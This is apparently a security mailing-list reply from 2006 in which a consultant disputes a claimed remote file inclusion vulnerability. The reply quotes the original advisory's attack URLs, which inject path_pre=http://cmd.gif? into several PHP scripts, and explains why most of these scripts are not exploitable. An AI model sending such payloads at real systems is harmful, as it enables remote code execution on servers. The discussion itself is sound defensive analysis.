Hi, D3nGeR@xxxxxxxxx schrieb am Mon, 21 Aug 2006 19:26:55 +0000: ># http://[Target]/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif? This script uses path_pre only as a part of for example $cm_cfgpath. It may be possible to use it, but it may be a little bit complicate. ># http://[Target]/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/userrating.php?path_pre=http://cmd.gif? > ># http://[Target]/[Path]/listing.php?path_pre=http://cmd.gif? All of this script intialize $path_pre and I see no way to manipulate them between initialization and usage. Regards Carsten -- Dipl.-Inform. Carsten Eilers IT-Sicherheit und Datenschutz <http://www.ceilers-it.de>